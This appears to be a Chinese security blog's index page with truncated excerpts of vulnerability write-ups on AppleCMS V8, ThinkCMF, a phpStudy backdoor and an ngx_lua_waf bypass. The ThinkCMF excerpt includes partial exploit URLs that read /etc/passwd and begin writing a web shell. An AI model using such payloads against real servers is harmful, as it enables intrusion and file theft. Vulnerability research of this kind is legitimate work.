未分类

苹果CMS V8 绕过前台RCE

POST /index.php?m=vod-search HTTP/1.1 Host: word.o2oxy.cn Content-Length: 500137 Cache-Control: max-age=0 Origin: http://word.o2oxy.cn Upgrade-Insecure-Requests: 1 Content-Type: appl...

ThinkCMF RCE

http://127.0.0.1/?a=display&templateFile=/etc/passwd Getshell http://127.0.0.1/?a=fetch&tem%20...%20%27%27&content=%3Cphp%3Efile_put_con...

phpStudy 隐藏web后门复现

GET / HTTP/1.1 Host: 192.168.1.16 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63....

密码保护:Bypass ngx_lua_waf

pass 0x00 前言  ngx_lua_waf是一款基于ngx_lua的web应用防火墙,使用简单,高性能、轻量级。默认防御规则在wafconf目录中,摘录几条核心的SQL注入防御规则: select.+(from|...